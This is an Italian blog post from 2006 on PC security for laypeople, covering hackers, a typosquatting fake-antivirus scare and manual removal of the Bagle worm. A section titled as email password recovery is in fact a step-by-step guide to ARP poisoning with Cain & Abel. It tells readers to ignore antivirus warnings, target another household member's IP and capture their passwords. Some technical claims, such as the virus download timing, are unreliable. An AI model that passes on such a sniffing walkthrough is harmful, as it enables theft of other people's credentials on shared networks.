&lt;p&gt;&lt;em&gt;&lt;font face="Geneva, Arial, Sans-serif" color="#ff0000" size=4&gt;SEZIONE 3: GLI HACKERS&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ffff00" size=4&gt;Sapete chi sono gli hackers? Gli hackers, volendo, ma hanno ben altro da fare, sono quei tipi che possono entrare nei computer altrui (non allarmatevi!!!!).&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ff6600" size=4&gt;Gli hackers sono quegli esperti di protocolli di sicurezza che utilizzano la loro esperienza soprattutto per migliorare le prestazioni del proprio computer. Ma sa fare molte altre cose un hacker: sa entrare illegalmente nei siti, sa creare programmi in breve tempo, sa navigare in modo invisibile, sa scoprire gli indirizii IP... &lt;/font&gt;&lt;/em&gt;
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ffff00" size=4&gt;Siccome questi non sono i moduli dedicati all'hacking, vi mostrerò alcuni siti utili per la sicurezza sul Web.&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ffff00" size=4&gt;Se avete paura che un hacker, dal vostro IP, arrivi al vostro computer, navigate segretamente cliccando &lt;a href="http://anonymouse.org/anonwww.html"&gt;QUI&lt;/a&gt;.&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;em&gt;&lt;font face="Comic Sans MS" color="#ffff00" size=4&gt;Vi consiglio vivamente di navigare invisibili, in modo da non essere rintracciati!&lt;/font&gt;&lt;/em&gt; 
&lt;p&gt;&lt;font face="Times New Roman" color="#000000" size=3&gt; &lt;/font&gt; 
&lt;div align=center&gt;&lt;font face="Garamond, Times, Serif" size=6&gt;Il gemello cattivo:&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;font face=Garamond size=6&gt;Attenti a quello che scrivete!&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;
&lt;hr&gt;
&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face="Geneva, Arial, Sans-serif" color="#0000ff" size=5&gt;Una bella navigata in Internet, che bello!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face="Geneva, Arial, Sans-serif" color="#ff0000" size=5&gt;Spesso capita di sbagliare URL di un sito, ma a volte sbagliare ci porta ad un'infezione di virus totale. Tutto funziona così: siete tornati dall'ufficio o avete appena finito di fare i compiti e volete fare una bella navigata su Internet. Cerchiamo delle belle foto di automobili oppure l'ultimissima recensione sulla PlayStation 3, e per farlo, si sa, si usa un motore di ricerca. Il motore di ricerca più famoso è certamente Google (che ricordiamo ha comprato anche YouTube, il sito dove si trovano i video musicali). Quindi digitiamo www.google.it, ma, per sbaglio, non ci accorgiamo che abbiamo messo gookle, invece di google. Nessun problema, visto che la schermata che appare è uguale alla schermata che appare se entriamo in Google, ma cosa succede internamente al nostro software? Tutto comincia ad essere infettato da miriadi di virus.&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#0000ff" size=5&gt;Che fare?&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=5&gt;La soluzione è e rimarrà sempre una: avviare una full scan con un ottimo antivirus (Norton o Kaspersky vanno benissimo). Il virus che avvia download immediati (si parla di 5 millisecondi per virus acquisito) viene definito virus &lt;font color="#0000ff"&gt;Typosquatting&lt;/font&gt;&lt;font color="#ff0000"&gt;. Esso, quando è avviatosi, presentasi con una scritta simile:&lt;/font&gt;&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;VIRUS ALERT!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;YOUR PC IS INFECTED!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;IT HAS BEEN DETECTED THAT YOUR PC HAS LEAST 3 DANGEROUS VIRUSES!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;TO KNOW FOR SURE YOU URGENTLY NEED TO RUN AN ANTIVIRUS TEST ON YOUR PC!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ff6600" size=5&gt;The consequences of spyware and virus presence on your pc might belike: loosing all the data, data might be stolen, your secrets might beexsposed. PROTECT YOUR PC! REMOVE ALL VIRUSES NOW!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=5&gt;Naturalmente compare poi il pulsante che ci consente di avviare una &amp;quot;full scan&amp;quot; per rimuovere i virus. Ma questa è solo una scusa: cliccando su tale pulsante, infatti, non farete altro che scaricare altre centinaia di virus!&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt; &lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt; &lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font face=Arial color="#ffff00" size=5&gt;Come recuperare la password dell'e-mail box&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt; &lt;/div&gt;
&lt;div align=left&gt;&lt;em&gt;&lt;font face=Arial color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt; &lt;/div&gt;
&lt;div&gt;&lt;font face="Verdana, Geneva, Arial, Sans-serif" color="#ff0000" size=5&gt;Capita, a volte, che qualcuno possa dimenticare la password della propria e-mail box (la casella di posta elettronica diversa ed unica sul Web per ogni utente registrato al servizio/provider). Allora, lì per lì, l'utente si strappa i capelli dalla testa, cercando di spremersi le meningi in modo da ricordare la password. Esiste un metodo un pò più semplice per recuperare la password perduta.&lt;/font&gt;&lt;/div&gt;
&lt;div&gt;
&lt;hr&gt;
&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font color="#0000ff" size=5&gt;Kamui The Best&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;font color="#0000ff" size=5&gt;&lt;em&gt;alla ricerca della password perduta&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font size=5&gt;
&lt;hr&gt;
&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face="Garamond, Times, Serif" color="#00ff00" size=5&gt;&lt;strong&gt;&lt;em&gt;Per recuperare la nostra password (anche a me, una volta, è successo, poi ho risolto la situazione in questo modo), occorre possedere diversi requisiti:&lt;/em&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face=Garamond color="#00ff00"&gt;&lt;/font&gt;&lt;/strong&gt;&lt;font size=5&gt; &lt;/font&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face=Garamond color="#ffff00" size=5&gt;&lt;em&gt;il programma Cain &amp;amp; Abel&lt;/em&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face=Garamond color="#ffff00" size=5&gt;&lt;em&gt;driver WinPcap v4.0 beta2&lt;/em&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/ul&gt;
&lt;p align=left&gt;&lt;font size=5&gt;&lt;strong&gt;&lt;font face=Garamond color="#00ff00"&gt;&lt;em&gt;A questo punto, possiamo avventurarci alla ricerca della password perduta...&lt;/em&gt;&lt;/font&gt;&lt;/strong&gt; &lt;/font&gt;
&lt;p align=left&gt;&lt;strong&gt;&lt;font face=Garamond color="#00ff00"&gt;&lt;/font&gt;&lt;/strong&gt;&lt;font size=5&gt;  &lt;/font&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Lucida Handwriting, Cursive" color="#ff0000"&gt;&lt;font size=5&gt;per prima cosa, occorre installare il programma Cain &amp;amp; Abel &lt;font color="#ffff00"&gt;(Nota: alcuni antivirus, come Norton o Kaspersky, possono indentificare Cain &amp;amp; Abel come software pericoloso; in tal caso, ignoriamo tutto)&lt;/font&gt;&lt;font color="#ff0000"&gt;;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000" size=5&gt;a questo punto subentrano i driver WinPcap v4.0 beta2: al termine dell'installazione di Cain &amp;amp; Abel, infatti, verrà richiesta l'installazione di questi driver, che tra l'altro sono necessari, in quanto senza di essi Cain &amp;amp; Abel non sarebbe in grado di reperire la password;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000"&gt;&lt;font size=5&gt;adesso, dopo queste installazioni, avviamo Cain &amp;amp; Abel. Dopo averlo avviato, passiamo alla schermata &lt;font color="#ffff00"&gt;Configure - Sniffer &lt;/font&gt;&lt;font color="#ff0000"&gt;ed impostiamo la schede di rete che usiamo per connetterci ad Internet;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000"&gt;&lt;font size=5&gt;dall'interfaccia principale del programma, premiamo sul pulsante &lt;font color="#ffff00"&gt;Start/Stop Sniffer&lt;/font&gt;&lt;font color="#ff0000"&gt;, facciamo clic col tasto destro del mouse su un punto vuoto della finestra, e, dal menu contestuale, facciamo clic su &lt;/font&gt;&lt;font color="#ffff00"&gt;Scan MAC&lt;/font&gt;&lt;font color="#ffff00"&gt; Adress &lt;/font&gt;&lt;font color="#ff0000"&gt;e confermiamo cliccando su OK;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#0000ff"&gt;&lt;font size=5&gt;(FASE FACOLTATIVA) &lt;font color="#ff0000"&gt;Nel caso non si conosca il proprio IP Adress, dovete aprire il prompt dei comandi (&lt;/font&gt;&lt;font color="#ffff00"&gt;Start - Tutti i programmi - Accessori - Prompt dei comandi &lt;/font&gt;&lt;font color="#ff0000"&gt;oppure facendo Start - Esegui ed inserendo nel campo sottostante &lt;/font&gt;&lt;font color="#ffff00"&gt;cmd&lt;/font&gt;&lt;font color="#ff0000"&gt;). Dopo aver aperto il prompt, inserite il comando &lt;/font&gt;&lt;font color="#ffff00"&gt;ipconfig &lt;/font&gt;&lt;font color="#ff0000"&gt;e premete Invio. A questo punto, cercate la voce Indirizzo IP e, accanto a questa scritta, c'è una serie di numeri: quello è il vostro indirizzo IP;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000"&gt;&lt;font size=5&gt;adesso ritorniamo su Cain &amp;amp; Abel e premiamo su &lt;font color="#ffff00"&gt;APR&lt;/font&gt;&lt;font color="#ff0000"&gt;, spostandoci sulla sezione Sniffer e cliccando sul tab APR; a questo punto, clicchiamo in una zona vuota all'interno dell'area &lt;/font&gt;&lt;font color="#ffff00"&gt;Configuration/Routed Packets&lt;/font&gt;&lt;font color="#ff0000"&gt; e premiamo il pulsante &lt;/font&gt;&lt;font color="#ffff00"&gt;Add to list&lt;/font&gt;&lt;font color="#ff0000"&gt; nella barra degli strumenti (quello a forma di +);&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000"&gt;&lt;font size=5&gt;apparirà a video la nuova schermata &lt;font color="#ffff00"&gt;New ARP Poison Routing&lt;/font&gt;&lt;font color="#ff0000"&gt;. Scorrete la lista di sinistra ed identificate un IP Adress casuale (quello di vostra sorella va benissimo...), mentre nella lista di destra scegliete quello del vostro router/modem. Alla fine, cliccate su OK per procedere;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;strong&gt;&lt;font face="Comic Sans MS" color="#ff0000" size=5&gt;adesso, selezionando il vostro IP Adress, vi apparirà automaticamente la vostra amata password; per quanto riguarda l'IP Adress di vostra sorella, beh, un pò di immaginazione... &lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/ol&gt;
&lt;p align=right&gt;&lt;font face="Courier New, Courier, Monospace" color="#800080" size=5&gt;&lt;em&gt;&lt;/em&gt;&lt;/font&gt; 
&lt;div align=center&gt;&lt;font face="Verdana, Geneva, Arial, Sans-serif" color="#33cccc" size=6&gt;Un nuovo nemico per il PC:&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;font color="#33cccc" size=6&gt;&lt;/font&gt; &lt;/div&gt;
&lt;div align=center&gt;&lt;font color="#ff9900" size=6&gt;Win32/Bagle&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;
&lt;hr&gt;
&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;Bagle è un nuovo virus abbastanza fastidioso. Più tecnicamente, è un worm polimorfo, che attacca i software di sicurezza, disablitando sia essi che i servizi di Windows.&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt; &lt;/div&gt;
&lt;div align=center&gt;&lt;font color="#ff0000" size=5&gt;&lt;em&gt;I sistemi vulnerabili a Bagle sono Windows 9x/ME/NT/200/XP/Server 2003&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;
&lt;hr&gt;
&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font color="#ffff00" size=5&gt;Come sbarazzarsi di Bagle&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font color="#ff6600"&gt;&lt;/font&gt;&lt;font size=5&gt; &lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font color="#ff6600" size=5&gt;In questo caso, i software di sicurezza vengono disabilitati, e quindi non possiamo contare sul loro prezioso aiuto. Innanzitutto occorre &amp;quot;snidiare&amp;quot; il nostro amico, che si è intrufolato nell'hard disk:&lt;/font&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font color="#ff00ff" size=5&gt;occorre fare una full scan dell'hard disk. Quando finite la scansione, dovete copiare i risultati della scansione;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font size=5&gt;&lt;font color="#ff00ff"&gt;copiate i risultati ed incollateli in una nuova pagina del Blocco Note (&lt;/font&gt;&lt;font color="#ffff00"&gt;Start - Tutti i programmi - Accessori - Blocco Note&lt;/font&gt;&lt;font color="#ff00ff"&gt;). A questo punto controllate se nell'elenco sono presenti i file &lt;/font&gt;&lt;font color="#ff6600"&gt;hldrrr.exe&lt;/font&gt;&lt;font color="#ff00ff"&gt;, &lt;/font&gt;&lt;font color="#ff6600"&gt;wintems.exe &lt;/font&gt;&lt;font color="#ff00ff"&gt;e &lt;/font&gt;&lt;font color="#ff6600"&gt;hidr.exe&lt;/font&gt;&lt;font color="#ff00ff"&gt; e poi cercate i driver &lt;/font&gt;&lt;font color="#00ff00"&gt;m_hook.sys&lt;/font&gt;&lt;font color="#ff00ff"&gt;;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font color="#ff00ff" size=5&gt;adesso, avviando il Task Manager di Windows, reperibile premendo la sequenza di tasti Ctrl+Alt+Canc, controlliamo nel tab Processi se tra le varie operazioni è presente il primo tipo di file citato nel punto 2 (hldrrr.exe). Se questo è presente, allora possiamo continuare l'eliminazione;&lt;/font&gt;&lt;/div&gt;&lt;/ol&gt;
&lt;p align=left&gt;&lt;font color="#ff00ff" size=5&gt;PREMESSA - Quando una macchina è stata infetta da un qualsiasi tipo di virus, è assai probabile che il sistema faccia delle copie di backup dei codici nocivi, il che comporta una riapparsa del virus, anche dopo la sua rimozione. Per procedere quindi dobbiamo disattivare questo strumento. Andando su &lt;font color="#ff0000"&gt;Start - Impostazioni - Pannello di controllo - Sistema &lt;/font&gt;&lt;font color="#ff00ff"&gt;(cliccare sull'icona per due volte) e dirigersi sul tab &lt;/font&gt;&lt;font color="#ff0000"&gt;Ripristino configurazione di sistema&lt;/font&gt;&lt;font color="#ff00ff"&gt;, da cui spuntiamo &lt;/font&gt;&lt;font color="#ff0000"&gt;Disattiva Ripristino configurazione di sistema&lt;/font&gt;&lt;font color="#ff00ff"&gt;; alla fine applichiamo le modifiche.&lt;/font&gt;&lt;/font&gt; 
&lt;ul&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font color="#ffcc00" size=5&gt;Bagle è uno di quei virus che non permettono il funzionamento dei sistemi di sicurezza del software, il che ci rende più difficile la sua rimozione. Occorre quindi usare un software che permette di bypassare il problema. In questo caso, è consigliabile usare &lt;font color="#0000ff"&gt;The Avenger&lt;/font&gt;&lt;font color="#ffcc00"&gt;. Se apriamo The Avenger, spuntiamo Load Script from file:. Occorre adesso creare lo script da caricare col nostro software;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font color="#ffcc00" size=5&gt;aprite il Blocco Note ed immettiamo un nome qualsiasi. Il contenuto della nuova pagina dovrà contenere i dati che vi ho immesso qui di seguito:&lt;/font&gt;&lt;/div&gt;&lt;/ul&gt;
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;strong&gt;Files to delete&lt;/strong&gt;&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires\m_hook.sys&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires\hidr.exe&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\WINDOWS\System32\wintems.exe&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\WINDOWS\system32\hldrrr.exe &lt;/font&gt;&lt;/em&gt;
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;folders to delete: &lt;/font&gt;&lt;/em&gt;
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\WINDOWS\exefld&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;registry keys to delete:&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;HKLM\SYSTEM\CurrentControlSet\Services\m_hook&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;HKLM\SYSTEM\CurrentControlSet\Enum\Root\&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;LEGACY_M_HOOK&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;  
&lt;p align=left&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;registry values to delete:&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;HKLM\Software\Microsoft\Windows\Current&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;Version\Run\ hldrrr&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;  
&lt;p align=left&gt;&lt;font color="#00ff00" size=5&gt;Ricordare che la sigla %SystemDrive% e [utente corrente] devono essere rispettivamente sostituiti con l'unità hardware in questione e il nome dell'utente.&lt;/font&gt; 
&lt;p align=left&gt;&lt;font color="#00ff00" size=5&gt;Alla fine, salvate il file e chiudete il Blocco Note. Adesso che abbiamo il nostro bel script fatto in casa, dobbiamo caricarlo con The Avenger. Alla fine della scansione, The Avenger ci chiederà di riavviare il PC e quindi voi effettuate il riavvio. Dopo il riavvio, ci verrà mostrato il log delle scansioni. Continuiamo la nostra caccia a Bagle usando l'editor del registro inserendo, da Start - Esegui, il comando &lt;font color="#ff6600"&gt;regedit&lt;/font&gt;&lt;font color="#00ff00"&gt; e cerchiamo la chiave &lt;/font&gt;&lt;font color="#ff0000"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows&lt;/font&gt;&lt;/font&gt;&lt;font color="#00ff00" size=5&gt;&lt;font color="#ff0000"&gt;\CurrentVersion\Run&lt;/font&gt;&lt;font color="#00ff00"&gt;.&lt;/font&gt;&lt;/font&gt; 
&lt;p align=left&gt;&lt;font color="#00ff00" size=5&gt;Adesso nella finestra di destra cerchiamo le voci &lt;font color="#ff0000"&gt;hldrrr&lt;/font&gt;&lt;font color="#00ff00"&gt;, &lt;/font&gt;&lt;font color="#ff0000"&gt;drvsyskit&lt;/font&gt;&lt;font color="#00ff00"&gt; e &lt;/font&gt;&lt;font color="#ff0000"&gt;german.exe&lt;/font&gt;&lt;font color="#00ff00"&gt;; se le abbiamo trovate, eliminatele, assieme alle chiavi &lt;/font&gt;&lt;font color="#ff0000"&gt;HKEY_CURRENT_USER\Software\DateTime4&lt;/font&gt;&lt;font color="#00ff00"&gt;, &lt;/font&gt;&lt;font color="#ff0000"&gt;HKEY_CURRENT_USER\Software\FirstRRRun&lt;/font&gt;&lt;font color="#00ff00"&gt;.&lt;/font&gt;&lt;/font&gt; 
&lt;p align=left&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt;  
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt; 
&lt;div align=left&gt;
&lt;hr&gt;
&lt;/div&gt;
&lt;div align=left&gt; &lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-9036054891036908415&amp;page=RSS%3a+Area+Sicurezza+Informatica&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=crypto1993.spaces.live.com&amp;amp;GT1=crypto1993"&gt;</description><comments>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!230.entry#comment</comments><guid isPermaLink="true">http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!230.entry</guid><pubDate>Mon, 02 Oct 2006 12:37:51 GMT</pubDate><slash:comments>4</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://crypto1993.spaces.live.com/blog/cns!82997BF3A0D06481!230/comments/feed.rss</wfw:commentRss><wfw:comment>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!230.entry#comment</wfw:comment><dcterms:modified>2007-03-15T16:36:25Z</dcterms:modified></item></channel></rss>